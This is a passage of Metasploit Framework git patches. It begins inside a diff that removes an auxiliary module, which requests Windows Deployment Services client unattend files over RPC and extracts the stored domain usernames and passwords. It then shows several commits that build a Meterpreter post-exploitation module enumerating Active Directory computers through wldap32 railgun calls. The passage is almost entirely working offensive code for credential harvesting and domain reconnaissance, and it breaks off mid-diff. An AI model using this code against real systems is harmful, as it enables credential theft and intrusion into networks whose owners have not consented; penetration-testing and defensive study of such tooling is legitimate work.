Rex::Proto::DCERPC::Packet - DCERPCClient = Rex::Proto::DCERPC::Client - DCERPCResponse = Rex::Proto::DCERPC::Response - DCERPCUUID = Rex::Proto::DCERPC::UUID - WDS_CONST = Rex::Proto::DCERPC::WDSCP::Constants - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Microsoft Windows Deployment Services Unattend Retrieval', - 'Description' => %q{ - This module retrieves the client unattend file from Windows - Deployment Services RPC service and parses out the stored credentials. - Tested against Windows 2008 R2 - }, - 'Author' => [ 'Ben Campbell ' ], - 'License' => MSF_LICENSE, - 'Version' => '', - 'References' => - [ - [ 'MSDN', 'http://msdn.microsoft.com/en-us/library/dd891255(prot.20).aspx'], - [ 'URL', 'http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html'] - ], - )) - - register_options( - [ - Opt::RPORT(5040), - ], self.class) - - deregister_options('RHOST', 'CHOST', 'CPORT', 'SSL', 'SSLVersion') - - register_advanced_options( - [ - OptBool.new('ENUM_ARM', [true, 'Enumerate Unattend for ARM architectures (not currently supported by Windows and will cause an error in System Event Log)', false]) - ], self.class) - end - - def run_host(ip) - begin - query_host(ip) - rescue ::Interrupt - raise $! - rescue ::Exception => e - print_error("#{ip}:#{rport} error: #{e}") - end - end - - def query_host(rhost) - # Create a handler with our UUID and Transfer Syntax - self.handle = Rex::Proto::DCERPC::Handle.new( - [ - WDS_CONST::WDSCP_RPC_UUID, - '1.0', - '71710533-beba-4937-8319-b5dbef9ccc36', - 1 - ], - 'ncacn_ip_tcp', - rhost, - [datastore['RPORT']] - ) - - print_status("Binding to #{handle} ...") - - self.dcerpc = Rex::Proto::DCERPC::Client.new(self.handle, self.sock) - print_good("Bound to #{handle}") - - report_service( - :host => rhost, - :port => datastore['RPORT'], - :proto => 'tcp', - :name => "dcerpc", - :info => "#{WDS_CONST::WDSCP_RPC_UUID} v1.0 Windows Deployment Services" - ) - - table = Rex::Ui::Text::Table.new({ - 'Header' => 'Windows Deployment Services', - 'Indent' => 1, - 'Columns' => ['Architecture', 'Type', 'Domain', 'Username', 'Password'] - }) - - creds_found = false - - WDS_CONST::ARCHITECTURE.each do |architecture| - if architecture[0] == :ARM && !datastore['ENUM_ARM'] - vprint_status "Skipping #{architecture[0]} architecture due to adv option" - next - end - - begin - result = request_client_unattend(architecture) - rescue ::Rex::Proto::DCERPC::Exceptions::Fault => e - vprint_error(e.to_s) - print_error("#{rhost} DCERPC Fault - Windows Deployment Services is present but not configured. Perhaps an SCCM installation.") - return - end - - unless result.nil? - loot_unattend(architecture[0], result) - results = parse_client_unattend(result) - - results.each do |result| - unless result.empty? - unless result['username'].nil? || result['password'].nil? - print_good("Retrived #{result['type']} credentials for #{architecture[0]}") - creds_found = true - domain = "" - domain = result['domain'] if result['domain'] - report_creds(domain, result['username'], result['password']) - table << [architecture[0], result['type'], domain, result['username'], result['password']] - end - end - end - end - end - - if creds_found - print_line - table.print - print_line - else - print_error("No Unattend files received, service is unlikely to be configured for completely unattended installation.") - end - end - - def request_client_unattend(architecture) - # Construct WDS Control Protocol Message - packet = Rex::Proto::DCERPC::WDSCP::Packet.new(:REQUEST, :GET_CLIENT_UNATTEND) - packet.add_var( WDS_CONST::VAR_NAME_ARCHITECTURE, [architecture[1]].pack('C')) - packet.add_var( WDS_CONST::VAR_NAME_CLIENT_GUID, - "\x35\x00\x36\x00\x34\x00\x44\x00\x41\x00\x36\x00\x31\x00\x44\x00"\ - "\x32\x00\x41\x00\x45\x00\x31\x00\x41\x00\x41\x00\x42\x00\x32\x00"\ - "\x38\x00\x36\x00\x34\x00\x46\x00\x34\x00\x34\x00\x46\x00\x32\x00"\ - "\x38\x00\x32\x00\x46\x00\x30\x00\x34\x00\x33\x00\x34\x00\x30\x00"\ - "\x00\x00") - packet.add_var( WDS_CONST::VAR_NAME_CLIENT_MAC, - "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"\ - "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"\ - "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x35\x00\x30\x00"\ - "\x35\x00\x36\x00\x33\x00\x35\x00\x31\x00\x41\x00\x37\x00\x35\x00"\ - "\x00\x00") - packet.add_var( WDS_CONST::VAR_NAME_VERSION,"\x00\x00\x00\x01\x00\x00\x00\x00") - wdsc_packet = packet.create - - print_status("Sending #{architecture[0]} Client Unattend request ...") - response = dcerpc.call(0, wdsc_packet) - - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - vprint_status('Received response ...') - data = dcerpc.last_response.stub_data - - # Check WDSC_Operation_Header OpCode-ErrorCode is success 0x000000 - op_error_code = data.unpack('i*')[18] - if op_error_code == 0 - if data.length < 277 - vprint_error("No Unattend received for #{architecture[0]} architecture") - return nil - else - vprint_status("Received #{architecture[0]} unattend file ...") - return extract_unattend(data) - end - else - vprint_error("Error code received for #{architecture[0]}: #{op_error_code}") - return nil - end - end - end - - def extract_unattend(data) - start = data.index('')+10 - return data[start..finish] - end - - def parse_client_unattend(data) - begin - xml = REXML::Document.new(data) - - rescue REXML::ParseException => e - print_error("Invalid XML format") - vprint_line(e.message) - end - - return Rex::Parser::Unattend.parse(xml).flatten - end - - def loot_unattend(archi, data) - return if data.empty? - p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, archi, "Windows Deployment Services") - print_status("Raw version of #{archi} saved as: #{p}") - end - - def report_creds(domain, user, pass) - report_auth_info( - :host => rhost, - :port => 4050, - :sname => 'dcerpc', - :proto => 'tcp', - :source_id => nil, - :source_type => "aux", - :user => "#{domain}\\#{user}", - :pass => pass) - end -end From b5fd3463d70e01c6154551033312bbfd11ff96da Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Mon, 17 Dec 2012 14:07:35 +0000 Subject: [PATCH 007/421] Initial working AD_LDAP lookup --- .../stdapi/railgun/def/def_wldap32.rb | 78 ++++++++- .../post/windows/gather/enum_ad_computers.rb | 163 ++++++++++++++++++ 2 files changed, 235 insertions(+), 6 deletions(-) create mode 100644 modules/post/windows/gather/enum_ad_computers.rb diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb index e13e618f5481..ff19667fbdcc 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb @@ -7,23 +7,89 @@ module Stdapi module Railgun module Def -class Def_wldap32 +class Def_wlanapi def self.create_dll(dll_path = 'wldap32') dll = DLL.new(dll_path, ApiConstants.manager) - - dll.add_function( 'ldap_sslinitW', 'PDWORD',[ + + dll.add_function('ldap_sslinitA', 'DWORD',[ ['PCHAR', 'HostName', 'in'], ['DWORD', 'PortNumber', 'in'], ['DWORD', 'secure', 'in'] ]) - - dll.add_function( 'ldap_simple_bind_sW', 'DWORD',[ + + dll.add_function('ldap_bind_sA', 'DWORD',[ ['DWORD', 'ld', 'in'], ['PCHAR', 'dn', 'in'], - ['PCHAR', 'passwd', 'in'] + ['PCHAR', 'cred', 'in'], + ['DWORD', 'method', 'in'] + ]) + + dll.add_function('ldap_search_sA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['PCHAR', 'base', 'in'], + ['DWORD', 'scope', 'in'], + ['PCHAR', 'filter', 'in'], + ['PCHAR', 'attrs[]', 'in'], + ['DWORD', 'attrsonly', 'in'], + ['PDWORD', 'res', 'out'] + ]) + + dll.add_function('ldap_count_entries', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'res', 'in'] + ]) + dll.add_function('ldap_first_entry', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'res', 'in'] + ]) + + dll.add_function('ldap_next_entry', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'] ]) + dll.add_function('ldap_first_attributeA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'], + ['DWORD', 'ptr', 'in'] + ]) + + dll.add_function('ldap_next_attributeA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'], + ['DWORD', 'ptr', 'inout'] + ]) + + dll.add_function('ldap_count_values', 'DWORD',[ + ['DWORD', 'vals', 'in'], + ]) + + dll.add_function('ldap_get_values', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'], + ['PCHAR', 'attr', 'in'] + ]) + + dll.add_function('ldap_value_free', 'DWORD',[ + ['DWORD', 'vals', 'in'], + ]) + + dll.add_function('ldap_memfree', 'VOID',[ + ['DWORD', 'block', 'in'], + ]) + + dll.add_function('ber_free', 'VOID',[ + ['DWORD', 'pBerElement', 'in'], + ['DWORD', 'fbuf', 'in'], + ]) + + dll.add_function('LdapGetLastError', 'DWORD',[]) + + dll.add_function('ldap_err2string', 'DWORD',[ + ['DWORD', 'err', 'in'] + ]) + return dll end diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb new file mode 100644 index 000000000000..645668501869 --- /dev/null +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -0,0 +1,163 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +# Multi platform requiere +require 'msf/core/post/common' +require 'msf/core/post/file' + +require 'msf/core/post/windows/registry' + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + include Msf::Post::File + + include Msf::Post::Windows::Registry + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Gather Enumerate Computers', + 'Description' => %q{ + This module will enumerate computers included in the primary Domain. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win'], + 'SessionTypes' => [ 'meterpreter' ] + )) + end + + # Run Method for when run command is issued + def run + + attributes = [ 'dNSHostName', 'distinguishedName', 'description', 'operatingSystem', 'operatingSystemServicePack', 'serverReferenceBL', 'userAccountControl'] + #attributes = [ 'objectClass','cn', 'description', 'distinguishedName','instanceType','whenCreated', + # 'whenChanged','uSNCreated','uSNChanged','name','objectGUID', + # 'userAccountControl','badPwdCount','codePage','countryCode', + # 'badPasswordTime','lastLogoff','lastLogon','localPolicyFlags', + # 'pwdLastSet','primaryGroupID','objectSid','accountExpires', + # 'logonCount','sAMAccountName','sAMAccountType','operatingSystem', + # 'operatingSystemVersion','operatingSystemServicePack','serverReferenceBL', + # 'dNSHostName','rIDSetPreferences','servicePrincipalName','objectCategory', + # 'netbootSCPBL','isCriticalSystemObject','frsComputerReferenceBL', + # 'lastLogonTimestamp','msDS-SupportedEncryptionTypes' + # ] + + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? + unless client.railgun.known_dll_names.include? 'wldap32' + print_status ("Adding wldap32.dll") + client.railgun.add_dll('wldap32','C:\\WINDOWS\\system32\\wldap32.dll') + end + wldap32 = client.railgun.wldap32 + + + + print_status ("Initialize LDAP connection.") + ldap_handle = wldap32.ldap_sslinitA(nil, 389, 0)['return'] + vprint_status("LDAP Handle: #{ldap_handle}") + + + + print_status ("Bindings to LDAP server.") + bind = wldap32.ldap_bind_sA(ldap_handle, nil, nil, 0x0486) #LDAP_AUTH_NEGOTIATE < add to ../api_constants.rb? + + + print_status ("Searching LDAP directory.") + + lDAP_SCOPE_BASE = 0 + lDAP_SCOPE_ONELEVEL = 1 + lDAP_SCOPE_SUBTREE = 2 + + base = "DC=test,DC=lab" + scope = lDAP_SCOPE_SUBTREE + + search = wldap32.ldap_search_sA(ldap_handle, base, scope, "(objectClass=computer)", nil, 0, 4) + vprint_status("search: #{search}") + + if search['return'] != 0 + client.railgun.add_function('wldap32', 'ldap_msgfree', 'DWORD', [ + ['DWORD', 'res', 'in'] + ]) + + wldap32.ldap_msgfree(search['res']) + + print_error("No results") + return + end + + print_status ("Counting number of search results") + search_count = wldap32.ldap_count_entries(ldap_handle, search['res'])['return'] + vprint_status("Search count: #{search_count}") + + + print_status("Retrieve results") + entries = {} + for i in 0..(search_count-1) + print_line "-"*46 + if i==0 + entries[i] = wldap32.ldap_first_entry(ldap_handle, search['res'])['return'] + else + entries[i] = wldap32.ldap_next_entry(ldap_handle, entries[i-1])['return'] + end + vprint_status("Entry #{i}: #{entries[i]}") + + #addr = valloc + #attribute = wldap32.ldap_first_attributeA(ldap_handle, entries[i], addr) + #puts attribute + #p_attribute = attribute['return'] + #vprint_status("p_attribute: #{p_attribute}") + #addr2 = client.railgun.memread(addr,16).unpack('V*')[0] + #puts addr2 + #attr = client.railgun.memread(p_attribute, 16) + + attributes.each do |attr| + print_status("Attr: #{attr}") + + pp_value = wldap32.ldap_get_values(ldap_handle, entries[i], attr)['return'] + vprint_status("ppValue: 0x#{pp_value.to_s(16)}") + + if pp_value == 0 + vprint_error("No attribute value returned.") + else + count = wldap32.ldap_count_values(pp_value)['return'] + vprint_status "Value count: #{count}" + + if count < 1 + vprint_error("Bad Value List") + else + for j in 0..(count-1) + p_value = client.railgun.memread(pp_value+(j*4), 4).unpack('V*')[0] + vprint_status "p_value: 0x#{p_value.to_s(16)}" + value = read_value(p_value) + print_status "Value: #{value}" + end + end + end + + if pp_value != 0 + vprint_status("Free value memory.") + wldap32.ldap_value_free(pp_value) + end + + #puts "free attribute" + #wldap32.ldap_memfree(p_attribute) + + #attribute = wldap32.ldap_next_attributeA(ldap_handle, entries[i], addr2) + #p_attribute = attribute['return'] + #vprint_status("Next Attribute: #{attribute}") + #if p_attribute == 0 + # attr = nil + #else + # attr = client.railgun.memread(p_attribute, 16).strip + #end + end + end + end +end From 6a92bd609ae1727e3c8bdb44d0f7aa699749dc6c Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Mon, 17 Dec 2012 15:29:04 +0000 Subject: [PATCH 008/421] Tidying and refactoring --- .../stdapi/railgun/def/def_wldap32.rb | 6 +- .../post/windows/gather/enum_ad_computers.rb | 61 +++++-------------- 2 files changed, 19 insertions(+), 48 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb index ff19667fbdcc..93a26496ee0f 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb @@ -7,7 +7,7 @@ module Stdapi module Railgun module Def -class Def_wlanapi +class Def_wldap32 def self.create_dll(dll_path = 'wldap32') dll = DLL.new(dll_path, ApiConstants.manager) @@ -90,6 +90,10 @@ def self.create_dll(dll_path = 'wldap32') ['DWORD', 'err', 'in'] ]) + dll.add_function('ldap_msgfree', 'DWORD', [ + ['DWORD', 'res', 'in'] + ]) + return dll end diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 645668501869..6572188234f7 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Gather Enumerate Computers', + 'Name' => 'Windows Gather AD Enumerate Computers', 'Description' => %q{ This module will enumerate computers included in the primary Domain. }, @@ -33,8 +33,13 @@ def initialize(info={}) 'SessionTypes' => [ 'meterpreter' ] )) end + + def read_value(addr) + val_size = client.railgun.memread(addr-4,4).unpack('V*')[0] + value = client.railgun.memread(addr, val_size) + return value.strip + end - # Run Method for when run command is issued def run attributes = [ 'dNSHostName', 'distinguishedName', 'description', 'operatingSystem', 'operatingSystemServicePack', 'serverReferenceBL', 'userAccountControl'] @@ -51,53 +56,36 @@ def run # ] print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? - unless client.railgun.known_dll_names.include? 'wldap32' - print_status ("Adding wldap32.dll") - client.railgun.add_dll('wldap32','C:\\WINDOWS\\system32\\wldap32.dll') - end - wldap32 = client.railgun.wldap32 - + wldap32 = client.railgun.wldap32 print_status ("Initialize LDAP connection.") ldap_handle = wldap32.ldap_sslinitA(nil, 389, 0)['return'] vprint_status("LDAP Handle: #{ldap_handle}") - - print_status ("Bindings to LDAP server.") - bind = wldap32.ldap_bind_sA(ldap_handle, nil, nil, 0x0486) #LDAP_AUTH_NEGOTIATE < add to ../api_constants.rb? - + bind = wldap32.ldap_bind_sA(ldap_handle, nil, nil, 0x0486) #LDAP_AUTH_NEGOTIATE print_status ("Searching LDAP directory.") - lDAP_SCOPE_BASE = 0 - lDAP_SCOPE_ONELEVEL = 1 - lDAP_SCOPE_SUBTREE = 2 - base = "DC=test,DC=lab" - scope = lDAP_SCOPE_SUBTREE + scope = 2 #LDAP_SCOPE_SUBTREE search = wldap32.ldap_search_sA(ldap_handle, base, scope, "(objectClass=computer)", nil, 0, 4) vprint_status("search: #{search}") if search['return'] != 0 - client.railgun.add_function('wldap32', 'ldap_msgfree', 'DWORD', [ - ['DWORD', 'res', 'in'] - ]) - - wldap32.ldap_msgfree(search['res']) - print_error("No results") + wldap32.ldap_msgfree(search['res']) return end - print_status ("Counting number of search results") search_count = wldap32.ldap_count_entries(ldap_handle, search['res'])['return'] - vprint_status("Search count: #{search_count}") + print_status("Entries retrieved: #{search_count}") - print_status("Retrieve results") + print_status("Retrieving results...") + entries = {} for i in 0..(search_count-1) print_line "-"*46 @@ -107,15 +95,6 @@ def run entries[i] = wldap32.ldap_next_entry(ldap_handle, entries[i-1])['return'] end vprint_status("Entry #{i}: #{entries[i]}") - - #addr = valloc - #attribute = wldap32.ldap_first_attributeA(ldap_handle, entries[i], addr) - #puts attribute - #p_attribute = attribute['return'] - #vprint_status("p_attribute: #{p_attribute}") - #addr2 = client.railgun.memread(addr,16).unpack('V*')[0] - #puts addr2 - #attr = client.railgun.memread(p_attribute, 16) attributes.each do |attr| print_status("Attr: #{attr}") @@ -145,18 +124,6 @@ def run vprint_status("Free value memory.") wldap32.ldap_value_free(pp_value) end - - #puts "free attribute" - #wldap32.ldap_memfree(p_attribute) - - #attribute = wldap32.ldap_next_attributeA(ldap_handle, entries[i], addr2) - #p_attribute = attribute['return'] - #vprint_status("Next Attribute: #{attribute}") - #if p_attribute == 0 - # attr = nil - #else - # attr = client.railgun.memread(p_attribute, 16).strip - #end end end end From d91e566d541ba557a0aa9b1b56e2f12985062165 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Wed, 19 Dec 2012 09:06:58 +0000 Subject: [PATCH 009/421] Further refactoring --- .../post/windows/gather/enum_ad_computers.rb | 129 ++++++++++++------ 1 file changed, 90 insertions(+), 39 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 6572188234f7..338fe1f2a664 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -5,21 +5,13 @@ # http://metasploit.com/ ## -require 'msf/core' require 'rex' - -# Multi platform requiere -require 'msf/core/post/common' -require 'msf/core/post/file' - -require 'msf/core/post/windows/registry' +require 'msf/core' +require 'msf/core/auxiliary/report' class Metasploit3 < Msf::Post - include Msf::Post::Common - include Msf::Post::File - - include Msf::Post::Windows::Registry + include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, @@ -28,21 +20,54 @@ def initialize(info={}) This module will enumerate computers included in the primary Domain. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Ben Campbell '], - 'Platform' => [ 'win'], + 'Author' => [ 'Ben Campbell ' ], + 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) end - + def read_value(addr) val_size = client.railgun.memread(addr-4,4).unpack('V*')[0] value = client.railgun.memread(addr, val_size) return value.strip end - - def run + def run + print_status("Connecting to default LDAP server") + session_handle = bind_default_ldap_server + + if session_handle == 0 + return + end + + print_status("Querying default naming context") + defaultNamingContext = query_ldap(session_handle, "", 0, "(objectClass=computer)", ["defaultNamingContext"])[0]['attributes'][0]['values'] + print_status("Default Naming Context #{defaultNamingContext}") + attributes = [ 'dNSHostName', 'distinguishedName', 'description', 'operatingSystem', 'operatingSystemServicePack', 'serverReferenceBL', 'userAccountControl'] + + print_status("Querying computer objects - Please wait...") + results = query_ldap(session_handle, defaultNamingContext, 2, "(objectClass=computer)", attributes) + + results_table = Rex::Ui::Text::Table.new( + 'Header' => 'AD Computers', + 'Indent' => 1, + 'SortIndex' => -1, + 'Columns' => attributes + ) + + results.each do |result| + row = [] + + result['attributes'].each do |attr| + row << attr['values'] + end + + results_table << row + end + + print_line results_table.to_s + #attributes = [ 'objectClass','cn', 'description', 'distinguishedName','instanceType','whenCreated', # 'whenChanged','uSNCreated','uSNChanged','name','objectGUID', # 'userAccountControl','badPwdCount','codePage','countryCode', @@ -54,24 +79,36 @@ def run # 'netbootSCPBL','isCriticalSystemObject','frsComputerReferenceBL', # 'lastLogonTimestamp','msDS-SupportedEncryptionTypes' # ] - - print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? - - wldap32 = client.railgun.wldap32 + end + + def wldap32 + return client.railgun.wldap32 + end + + def bind_default_ldap_server + vprint_status ("Initializing LDAP connection.") + session_handle = wldap32.ldap_sslinitA("\x00\x00\x00\x00", 389, 0)['return'] + vprint_status("LDAP Handle: #{session_handle}") - print_status ("Initialize LDAP connection.") - ldap_handle = wldap32.ldap_sslinitA(nil, 389, 0)['return'] - vprint_status("LDAP Handle: #{ldap_handle}") + if session_handle == 0 + print_error("Unable to connect to LDAP server") + return 0 + end - print_status ("Bindings to LDAP server.") - bind = wldap32.ldap_bind_sA(ldap_handle, nil, nil, 0x0486) #LDAP_AUTH_NEGOTIATE + vprint_status ("Binding to LDAP server.") + bind = wldap32.ldap_bind_sA(session_handle, nil, nil, 0x0486)['return'] #LDAP_AUTH_NEGOTIATE - print_status ("Searching LDAP directory.") - - base = "DC=test,DC=lab" - scope = 2 #LDAP_SCOPE_SUBTREE + if bind != 0 + print_error("Unable to bind to LDAP server") + return 0 + end + + return session_handle + end - search = wldap32.ldap_search_sA(ldap_handle, base, scope, "(objectClass=computer)", nil, 0, 4) + def query_ldap(session_handle, base, scope, filter, attributes) + vprint_status ("Searching LDAP directory.") + search = wldap32.ldap_search_sA(session_handle, base, scope, filter, nil, 0, 4) vprint_status("search: #{search}") if search['return'] != 0 @@ -80,26 +117,30 @@ def run return end - search_count = wldap32.ldap_count_entries(ldap_handle, search['res'])['return'] + search_count = wldap32.ldap_count_entries(session_handle, search['res'])['return'] print_status("Entries retrieved: #{search_count}") - - print_status("Retrieving results...") + vprint_status("Retrieving results...") entries = {} + entry_results = [] + + # user definied limit on entries to search? for i in 0..(search_count-1) - print_line "-"*46 + print '.' + if i==0 - entries[i] = wldap32.ldap_first_entry(ldap_handle, search['res'])['return'] + entries[i] = wldap32.ldap_first_entry(session_handle, search['res'])['return'] else - entries[i] = wldap32.ldap_next_entry(ldap_handle, entries[i-1])['return'] + entries[i] = wldap32.ldap_next_entry(session_handle, entries[i-1])['return'] end vprint_status("Entry #{i}: #{entries[i]}") + attribute_results = [] attributes.each do |attr| - print_status("Attr: #{attr}") + vprint_status("Attr: #{attr}") - pp_value = wldap32.ldap_get_values(ldap_handle, entries[i], attr)['return'] + pp_value = wldap32.ldap_get_values(session_handle, entries[i], attr)['return'] vprint_status("ppValue: 0x#{pp_value.to_s(16)}") if pp_value == 0 @@ -108,6 +149,7 @@ def run count = wldap32.ldap_count_values(pp_value)['return'] vprint_status "Value count: #{count}" + value_results = [] if count < 1 vprint_error("Bad Value List") else @@ -115,8 +157,10 @@ def run p_value = client.railgun.memread(pp_value+(j*4), 4).unpack('V*')[0] vprint_status "p_value: 0x#{p_value.to_s(16)}" value = read_value(p_value) - print_status "Value: #{value}" + vprint_status "Value: #{value}" + value_results << value end + value_results = value_results.join('|') end end @@ -124,7 +168,14 @@ def run vprint_status("Free value memory.") wldap32.ldap_value_free(pp_value) end + + attribute_results << {"name" => attr, "values" => value_results} end + + entry_results << {"id" => i, "attributes" => attribute_results} end + + print_line + return entry_results end end From 761d83ac0ce110b2d3c67c6831ed0b02b7671d62 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Thu, 20 Dec 2012 16:29:21 +0000 Subject: [PATCH 010/421] Tidyup and user options --- .../post/windows/gather/enum_ad_computers.rb | 59 +++++++++++++------ 1 file changed, 42 insertions(+), 17 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 338fe1f2a664..81470e443fce 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -17,13 +17,19 @@ def initialize(info={}) super( update_info( info, 'Name' => 'Windows Gather AD Enumerate Computers', 'Description' => %q{ - This module will enumerate computers included in the primary Domain. + This module will enumerate computers in the default AD directory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell ' ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) + + register_options([ + OptInt.new('MAX_SEARCH', [true, 'Maximum values to retrieve, 0 for all.', 20]), + OptBool.new('STORE', [true, 'Store file in loot.', false]), + OptString.new('ATTRIBS', [true, 'Attributes to retrieve.', 'dNSHostName,distinguishedName,description,operatingSystem']) + ], self.class) end def read_value(addr) @@ -44,7 +50,19 @@ def run defaultNamingContext = query_ldap(session_handle, "", 0, "(objectClass=computer)", ["defaultNamingContext"])[0]['attributes'][0]['values'] print_status("Default Naming Context #{defaultNamingContext}") - attributes = [ 'dNSHostName', 'distinguishedName', 'description', 'operatingSystem', 'operatingSystemServicePack', 'serverReferenceBL', 'userAccountControl'] + attributes = datastore['ATTRIBS'].split(',') + + #attributes = [ 'objectClass','cn', 'description', 'distinguishedName','instanceType','whenCreated', + # 'whenChanged','uSNCreated','uSNChanged','name','objectGUID', + # 'userAccountControl','badPwdCount','codePage','countryCode', + # 'badPasswordTime','lastLogoff','lastLogon','localPolicyFlags', + # 'pwdLastSet','primaryGroupID','objectSid','accountExpires', + # 'logonCount','sAMAccountName','sAMAccountType','operatingSystem', + # 'operatingSystemVersion','operatingSystemServicePack','serverReferenceBL', + # 'dNSHostName','rIDSetPreferences','servicePrincipalName','objectCategory', + # 'netbootSCPBL','isCriticalSystemObject','frsComputerReferenceBL', + # 'lastLogonTimestamp','msDS-SupportedEncryptionTypes' + # ] print_status("Querying computer objects - Please wait...") results = query_ldap(session_handle, defaultNamingContext, 2, "(objectClass=computer)", attributes) @@ -60,25 +78,22 @@ def run row = [] result['attributes'].each do |attr| - row << attr['values'] + if attr['values'].nil? + row << "" + else + row << attr['values'] + end end results_table << row + end print_line results_table.to_s - - #attributes = [ 'objectClass','cn', 'description', 'distinguishedName','instanceType','whenCreated', - # 'whenChanged','uSNCreated','uSNChanged','name','objectGUID', - # 'userAccountControl','badPwdCount','codePage','countryCode', - # 'badPasswordTime','lastLogoff','lastLogon','localPolicyFlags', - # 'pwdLastSet','primaryGroupID','objectSid','accountExpires', - # 'logonCount','sAMAccountName','sAMAccountType','operatingSystem', - # 'operatingSystemVersion','operatingSystemServicePack','serverReferenceBL', - # 'dNSHostName','rIDSetPreferences','servicePrincipalName','objectCategory', - # 'netbootSCPBL','isCriticalSystemObject','frsComputerReferenceBL', - # 'lastLogonTimestamp','msDS-SupportedEncryptionTypes' - # ] + if datastore['STORE'] + stored_path = store_loot('ad.computers', 'text/plain', session, results_table.to_s) + print_status("Results saved to: #{stored_path}") + end end def wldap32 @@ -125,8 +140,14 @@ def query_ldap(session_handle, base, scope, filter, attributes) entries = {} entry_results = [] + if datastore['MAX_SEARCH'] == 0 + max_search = search_count + else + max_search = [datastore['MAX_SEARCH'], search_count].min + end + # user definied limit on entries to search? - for i in 0..(search_count-1) + for i in 0..(max_search-1) print '.' if i==0 @@ -158,7 +179,11 @@ def query_ldap(session_handle, base, scope, filter, attributes) vprint_status "p_value: 0x#{p_value.to_s(16)}" value = read_value(p_value) vprint_status "Value: #{value}" - value_results << value + if value.nil? + value_results << "" + else + value_results << value + end end value_results = value_results.join('|') end From e8cf26390a1bfcdd66a9045d70ead6026f5e554c Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Thu, 20 Dec 2012 16:34:10 +0000 Subject: [PATCH 011/421] Msftidy --- .../post/windows/gather/enum_ad_computers.rb | 66 +++++++++---------- 1 file changed, 33 insertions(+), 33 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 81470e443fce..caf0278fd2cf 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -24,7 +24,7 @@ def initialize(info={}) 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) - + register_options([ OptInt.new('MAX_SEARCH', [true, 'Maximum values to retrieve, 0 for all.', 20]), OptBool.new('STORE', [true, 'Store file in loot.', false]), @@ -37,21 +37,21 @@ def read_value(addr) value = client.railgun.memread(addr, val_size) return value.strip end - + def run print_status("Connecting to default LDAP server") session_handle = bind_default_ldap_server - + if session_handle == 0 return end - + print_status("Querying default naming context") defaultNamingContext = query_ldap(session_handle, "", 0, "(objectClass=computer)", ["defaultNamingContext"])[0]['attributes'][0]['values'] print_status("Default Naming Context #{defaultNamingContext}") - + attributes = datastore['ATTRIBS'].split(',') - + #attributes = [ 'objectClass','cn', 'description', 'distinguishedName','instanceType','whenCreated', # 